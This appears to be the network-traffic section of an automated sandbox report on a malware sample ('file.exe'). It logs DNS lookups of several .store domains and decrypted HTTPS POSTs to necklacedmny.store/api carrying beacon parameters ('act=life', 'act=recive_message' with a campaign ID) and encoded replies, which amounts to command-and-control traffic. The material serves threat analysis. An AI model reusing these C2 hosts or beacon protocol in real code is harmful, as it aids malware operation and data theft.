                                                                                  Oct 29, 2024 12:04:12.568156958 CET44349710188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:12.568182945 CET49710443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:12.568208933 CET44349710188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:12.568272114 CET49710443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:12.568391085 CET44349710188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:12.568459988 CET44349710188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:12.568500996 CET44349710188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:12.568515062 CET49710443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:12.568533897 CET44349710188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:12.568591118 CET49710443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:12.678390980 CET44349710188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:12.690656900 CET44349710188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:12.690691948 CET44349710188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:12.690712929 CET49710443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:12.690740108 CET44349710188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:12.690793991 CET49710443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:12.690808058 CET44349710188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:12.690836906 CET44349710188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:12.690882921 CET49710443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:12.691010952 CET49710443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:12.691041946 CET44349710188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:12.691082001 CET49710443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:12.691096067 CET44349710188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:12.774846077 CET49712443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:12.774883032 CET44349712188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:12.774956942 CET49712443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:12.775213957 CET49712443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:12.775224924 CET44349712188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:13.394095898 CET44349712188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:13.394196987 CET49712443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:13.398001909 CET49712443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:13.398011923 CET44349712188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:13.398336887 CET44349712188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:13.399662018 CET49712443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:13.399822950 CET49712443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:13.399852991 CET44349712188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:50.576473951 CET44349712188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:50.576601982 CET44349712188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:50.576697111 CET49712443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:50.576942921 CET49712443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:50.576957941 CET44349712188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:50.704180002 CET49899443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:50.704209089 CET44349899188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:50.704298019 CET49899443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:50.704565048 CET49899443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:50.704580069 CET44349899188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:51.310209036 CET44349899188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:51.310319901 CET49899443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:51.311928988 CET49899443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:51.311937094 CET44349899188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:51.312854052 CET44349899188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:51.321676016 CET49899443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:51.321803093 CET49899443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:51.321840048 CET44349899188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:51.321903944 CET49899443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:51.321911097 CET44349899188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:51.858043909 CET44349899188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:51.858303070 CET44349899188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:51.858664036 CET49899443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:51.858798027 CET49899443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:51.858815908 CET44349899188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:52.059334040 CET49908443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:52.059357882 CET44349908188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:52.059451103 CET49908443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:52.059700966 CET49908443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:52.059711933 CET44349908188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:52.682063103 CET44349908188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:52.682166100 CET49908443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:52.683289051 CET49908443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:52.683300018 CET44349908188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:52.683655024 CET44349908188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:52.685223103 CET49908443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:52.685363054 CET49908443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:52.685400963 CET44349908188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:52.685491085 CET49908443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:52.685501099 CET44349908188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:53.357079983 CET44349908188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:53.357177973 CET44349908188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:53.357373953 CET49908443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:53.357445002 CET49908443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:53.357460976 CET44349908188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:53.830432892 CET49919443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:53.830548048 CET44349919188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:53.830648899 CET49919443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:53.831015110 CET49919443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:53.831052065 CET44349919188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:54.614731073 CET44349919188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:54.614906073 CET49919443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:54.616039991 CET49919443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:54.616054058 CET44349919188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:54.616285086 CET44349919188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:54.617480040 CET49919443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:54.617566109 CET49919443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:54.617573977 CET44349919188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:08.877108097 CET49919443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:09.350604057 CET49989443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:09.350645065 CET44349989188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:09.350723028 CET49989443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:09.351099014 CET49989443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:09.351111889 CET44349989188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:09.974945068 CET44349989188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:09.975037098 CET49989443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:09.980007887 CET49989443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:09.980024099 CET44349989188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:09.980217934 CET44349989188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:09.981524944 CET49989443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:09.982270956 CET49989443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:09.982300043 CET44349989188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:09.982777119 CET49989443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:09.982805967 CET44349989188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:09.982939005 CET49989443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:09.982968092 CET44349989188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:09.983092070 CET49989443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:09.983110905 CET44349989188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:09.983717918 CET49989443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:09.983741999 CET44349989188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:09.984062910 CET49989443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:09.984081030 CET44349989188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:09.984088898 CET49989443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:09.984103918 CET44349989188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:09.984217882 CET49989443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:09.984242916 CET44349989188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:09.984261036 CET49989443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:09.984389067 CET49989443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:09.984415054 CET49989443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:09.994012117 CET44349989188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:09.994184017 CET49989443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:09.994214058 CET49989443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:09.994224072 CET44349989188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:09.994235992 CET49989443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:09.994257927 CET44349989188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:09.994330883 CET49989443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:09.994415998 CET44349989188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:42.873558044 CET44349989188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:42.873796940 CET44349989188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:42.873858929 CET49989443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:42.873908997 CET49989443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:42.873924017 CET44349989188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:42.933033943 CET49992443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:42.933079004 CET44349992188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:42.933312893 CET49992443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:42.933613062 CET49992443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:42.933634996 CET44349992188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:43.554068089 CET44349992188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:43.554162025 CET49992443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:43.556852102 CET49992443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:43.556884050 CET44349992188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:43.557291031 CET44349992188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:43.650943995 CET49992443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:05:43.651072979 CET44349992188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:05:43.651153088 CET49992443192.168.2.6188.114.96.3

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Oct 29, 2024 12:04:08.899007082 CET5663153192.168.2.61.1.1.1
                                                                                  Oct 29, 2024 12:04:08.908905029 CET53566311.1.1.1192.168.2.6
                                                                                  Oct 29, 2024 12:04:08.915142059 CET6255353192.168.2.61.1.1.1
                                                                                  Oct 29, 2024 12:04:08.924704075 CET53625531.1.1.1192.168.2.6
                                                                                  Oct 29, 2024 12:04:08.925952911 CET5361853192.168.2.61.1.1.1
                                                                                  Oct 29, 2024 12:04:08.940785885 CET53536181.1.1.1192.168.2.6
                                                                                  Oct 29, 2024 12:04:08.942332029 CET5786853192.168.2.61.1.1.1
                                                                                  Oct 29, 2024 12:04:08.962974072 CET53578681.1.1.1192.168.2.6
                                                                                  Oct 29, 2024 12:04:08.983859062 CET5395253192.168.2.61.1.1.1
                                                                                  Oct 29, 2024 12:04:08.996100903 CET53539521.1.1.1192.168.2.6

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Oct 29, 2024 12:04:08.899007082 CET192.168.2.61.1.1.10x45d2Standard query (0)presticitpo.storeA (IP address)IN (0x0001)false
                                                                                  Oct 29, 2024 12:04:08.915142059 CET192.168.2.61.1.1.10x83fdStandard query (0)crisiwarny.storeA (IP address)IN (0x0001)false
                                                                                  Oct 29, 2024 12:04:08.925952911 CET192.168.2.61.1.1.10x1e20Standard query (0)fadehairucw.storeA (IP address)IN (0x0001)false
                                                                                  Oct 29, 2024 12:04:08.942332029 CET192.168.2.61.1.1.10x1ab3Standard query (0)thumbystriw.storeA (IP address)IN (0x0001)false
                                                                                  Oct 29, 2024 12:04:08.983859062 CET192.168.2.61.1.1.10xdb5aStandard query (0)necklacedmny.storeA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Oct 29, 2024 12:04:08.908905029 CET1.1.1.1192.168.2.60x45d2Name error (3)presticitpo.storenonenoneA (IP address)IN (0x0001)false
                                                                                  Oct 29, 2024 12:04:08.924704075 CET1.1.1.1192.168.2.60x83fdName error (3)crisiwarny.storenonenoneA (IP address)IN (0x0001)false
                                                                                  Oct 29, 2024 12:04:08.940785885 CET1.1.1.1192.168.2.60x1e20Name error (3)fadehairucw.storenonenoneA (IP address)IN (0x0001)false
                                                                                  Oct 29, 2024 12:04:08.962974072 CET1.1.1.1192.168.2.60x1ab3Name error (3)thumbystriw.storenonenoneA (IP address)IN (0x0001)false
                                                                                  Oct 29, 2024 12:04:08.996100903 CET1.1.1.1192.168.2.60xdb5aNo error (0)necklacedmny.store188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Oct 29, 2024 12:04:08.996100903 CET1.1.1.1192.168.2.60xdb5aNo error (0)necklacedmny.store188.114.97.3A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • necklacedmny.store

                                                                                  HTTPS Proxied Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.649709188.114.96.34432736C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-29 11:04:09 UTC265OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 8
                                                                                  Host: necklacedmny.store
                                                                                  2024-10-29 11:04:09 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                  Data Ascii: act=life
                                                                                  2024-10-29 11:04:10 UTC1015INHTTP/1.1 200 OK
                                                                                  Date: Tue, 29 Oct 2024 11:04:10 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=18ttpnbpqc4bvqgcckucp6qmsu; expires=Sat, 22 Feb 2025 04:50:49 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OjoS0ZjX9lOZUaLH1mqD8%2B8AjYhz1dGL3dCkWrPOtJDCn%2Bojw51WP6FBpzbwiHk7o6UpMH27dxopXfeJ10WB0pAEwUfd3jPphqGmyUNWxOkeCCvl6YboXfqJXs%2BE1%2F0ovY2HZbg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8da2aee5d8562e63-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1303&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=2253696&cwnd=251&unsent_bytes=0&cid=b4512429f25b1be7&ts=534&x=0"
                                                                                  2024-10-29 11:04:10 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                  Data Ascii: 2ok
                                                                                  2024-10-29 11:04:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.649710188.114.96.34432736C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-29 11:04:11 UTC266OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 52
                                                                                  Host: necklacedmny.store
                                                                                  2024-10-29 11:04:11 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                                                  2024-10-29 11:04:12 UTC1020INHTTP/1.1 200 OK
                                                                                  Date: Tue, 29 Oct 2024 11:04:12 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=fgs5cgnf8a5cbfb5s5b0hm6cr3; expires=Sat, 22 Feb 2025 04:50:51 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ep9Qc08TuyFphHiaMrKtBLw%2Bt35XfZQpVoI0xsA3t0lVZt7pDPJ2qCo%2BProkFNJpx1lXx2bhsZAMWuTG%2B3Wzdhq%2FKzm%2B4YDCuqJ1O0DIhLltDvDkQ1iWJwn%2FlD7umzuMm8vlsqQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8da2aeed8dc9e847-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1389&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=954&delivery_rate=1984921&cwnd=251&unsent_bytes=0&cid=4d8b66ac883ec25d&ts=1507&x=0"
                                                                                  2024-10-29 11:04:12 UTC349INData Raw: 34 64 63 0d 0a 4a 74 51 57 4c 42 70 46 42 72 2b 34 7a 4a 58 58 50 47 67 7a 78 4d 44 42 4c 2f 69 78 33 67 47 4f 50 36 7a 45 70 63 34 49 49 2b 68 64 39 6d 41 4f 49 48 45 71 6e 63 75 70 74 2b 31 49 47 6b 61 68 37 4f 4e 4f 6e 4a 50 6b 5a 2b 39 54 33 36 47 4a 37 48 35 4f 79 68 79 79 64 30 42 70 49 43 71 64 33 62 53 33 37 57 63 54 45 61 47 75 34 78 58 61 31 4c 52 6a 37 31 50 4f 70 63 36 68 65 45 2b 4c 54 72 68 78 52 48 38 6d 59 74 37 55 6f 66 43 79 57 51 6c 5a 71 71 6d 73 52 35 57 54 38 69 50 72 52 59 37 2b 68 34 4e 74 56 34 6c 72 74 57 56 48 4f 44 67 71 78 4a 71 70 2b 2f 55 47 53 6c 4b 68 6f 71 31 4a 6e 4e 71 32 61 65 5a 62 7a 36 44 50 76 6d 46 46 67 45 36 32 63 6b 56 31 4c 33 62 54 33 71 62 37 74 46 4d 4a 45 65 6a 69 70 46 58 61 69 2f 77 77 33 6c 37 66 74 39
                                                                                  Data Ascii: 4dcJtQWLBpFBr+4zJXXPGgzxMDBL/ix3gGOP6zEpc4II+hd9mAOIHEqncupt+1IGkah7ONOnJPkZ+9T36GJ7H5Oyhyyd0BpICqd3bS37WcTEaGu4xXa1LRj71POpc6heE+LTrhxRH8mYt7UofCyWQlZqqmsR5WT8iPrRY7+h4NtV4lrtWVHODgqxJqp+/UGSlKhoq1JnNq2aeZbz6DPvmFFgE62ckV1L3bT3qb7tFMJEejipFXai/ww3l7ft9
                                                                                  2024-10-29 11:04:12 UTC902INData Raw: 63 6b 42 35 4b 6d 54 50 30 71 58 38 73 45 77 42 57 4b 75 76 6f 30 43 51 33 4c 39 6a 36 31 66 45 71 63 32 6f 5a 30 79 4d 52 4c 59 30 41 44 67 67 66 4a 32 43 37 74 53 77 54 67 31 64 73 4f 43 5a 44 59 57 64 70 53 50 72 55 59 37 2b 68 36 52 76 51 6f 6c 50 75 58 64 47 63 7a 56 6b 7a 39 79 6a 38 71 64 59 44 31 2b 73 6f 62 46 48 6c 4e 57 2f 61 75 64 55 79 36 48 44 37 43 51 42 6a 56 7a 32 4c 41 35 5a 4b 6d 2f 52 30 4c 6e 33 39 55 46 45 53 4f 61 6c 72 77 33 43 6b 37 68 69 36 46 7a 4b 71 4d 6d 6f 5a 6b 65 45 53 62 6c 79 52 48 67 67 62 74 58 53 72 2f 71 2b 55 51 70 55 71 36 61 6c 51 5a 76 57 2f 43 32 73 57 74 62 6d 6e 2b 78 45 52 6f 6c 57 39 45 46 4e 64 69 6c 6a 79 35 71 78 75 61 77 65 44 56 33 6d 2b 75 4e 44 6e 39 79 75 59 76 35 59 77 4c 54 4c 71 57 78 4d 69 55 71
                                                                                  Data Ascii: ckB5KmTP0qX8sEwBWKuvo0CQ3L9j61fEqc2oZ0yMRLY0ADggfJ2C7tSwTg1dsOCZDYWdpSPrUY7+h6RvQolPuXdGczVkz9yj8qdYD1+sobFHlNW/audUy6HD7CQBjVz2LA5ZKm/R0Ln39UFESOalrw3Ck7hi6FzKqMmoZkeESblyRHggbtXSr/q+UQpUq6alQZvW/C2sWtbmn+xERolW9EFNdiljy5qxuaweDV3m+uNDn9yuYv5YwLTLqWxMiUq
                                                                                  2024-10-29 11:04:12 UTC1369INData Raw: 33 66 39 30 0d 0a 4b 6d 76 55 30 36 66 6c 76 31 49 45 51 36 75 6f 70 6b 4f 57 31 72 4e 6a 37 56 7a 41 72 4d 7a 73 4a 41 47 4e 58 50 59 73 44 6c 63 71 64 4d 2f 51 70 65 62 33 61 77 6c 66 71 4b 57 31 44 59 57 64 70 53 50 72 55 59 37 2b 68 36 64 73 54 59 5a 45 73 47 5a 41 64 7a 56 75 7a 39 36 67 38 37 6c 51 41 31 79 70 70 37 46 4a 6d 73 47 39 5a 75 74 54 77 37 54 43 37 43 51 42 6a 56 7a 32 4c 41 35 43 45 32 50 4e 79 36 6d 31 67 46 30 45 58 36 47 30 34 31 4c 55 79 76 78 6b 34 42 32 57 35 73 53 67 5a 30 69 50 53 36 52 2b 51 6e 6b 31 59 39 54 54 70 50 61 37 55 51 46 64 6f 37 43 6f 51 70 4c 63 76 57 37 68 56 73 71 6d 68 2b 49 71 52 70 49 45 37 6a 52 76 64 53 68 32 33 73 76 73 77 72 5a 51 42 46 61 77 34 72 77 44 67 35 4f 37 62 36 77 46 6a 71 66 4c 6f 47 74 4f 6a
                                                                                  Data Ascii: 3f90KmvU06flv1IEQ6uopkOW1rNj7VzArMzsJAGNXPYsDlcqdM/Qpeb3awlfqKW1DYWdpSPrUY7+h6dsTYZEsGZAdzVuz96g87lQA1ypp7FJmsG9ZutTw7TC7CQBjVz2LA5CE2PNy6m1gF0EX6G041LUyvxk4B2W5sSgZ0iPS6R+Qnk1Y9TTpPa7UQFdo7CoQpLcvW7hVsqmh+IqRpIE7jRvdSh23svswrZQBFaw4rwDg5O7b6wFjqfLoGtOj
                                                                                  2024-10-29 11:04:12 UTC1369INData Raw: 46 63 79 4e 67 33 64 65 6c 2b 62 74 58 42 6c 6d 71 70 62 46 41 6e 39 75 32 61 75 6c 52 77 36 58 56 72 32 73 42 78 41 53 78 62 41 34 67 5a 30 50 75 37 59 32 33 71 68 41 54 45 61 47 75 34 78 58 61 30 72 52 6b 34 6c 6e 63 71 4e 57 69 62 55 47 4d 54 4c 35 7a 51 6e 59 70 64 74 58 62 72 76 6d 36 56 67 4e 56 70 36 61 6e 51 5a 32 54 38 69 50 72 52 59 37 2b 68 34 52 70 57 35 41 47 6d 48 39 4f 66 7a 64 79 78 70 71 78 75 61 77 65 44 56 33 6d 2b 75 4e 4a 6b 64 6d 31 59 4f 56 5a 77 36 62 4f 6f 32 4e 4a 68 30 79 6b 64 55 52 71 49 32 48 63 31 61 54 7a 76 56 49 46 58 61 4b 77 71 41 33 55 6b 37 74 37 72 41 57 4f 68 73 79 36 53 56 4f 59 42 4b 6b 36 56 7a 67 67 61 4a 32 43 37 76 36 35 58 77 74 62 6f 4b 6d 6d 51 4a 72 57 74 6d 54 67 58 63 36 6c 77 61 70 6e 53 59 4a 49 75 6e
                                                                                  Data Ascii: FcyNg3del+btXBlmqpbFAn9u2aulRw6XVr2sBxASxbA4gZ0Pu7Y23qhATEaGu4xXa0rRk4lncqNWibUGMTL5zQnYpdtXbrvm6VgNVp6anQZ2T8iPrRY7+h4RpW5AGmH9OfzdyxpqxuaweDV3m+uNJkdm1YOVZw6bOo2NJh0ykdURqI2Hc1aTzvVIFXaKwqA3Uk7t7rAWOhsy6SVOYBKk6VzggaJ2C7v65XwtboKmmQJrWtmTgXc6lwapnSYJIun
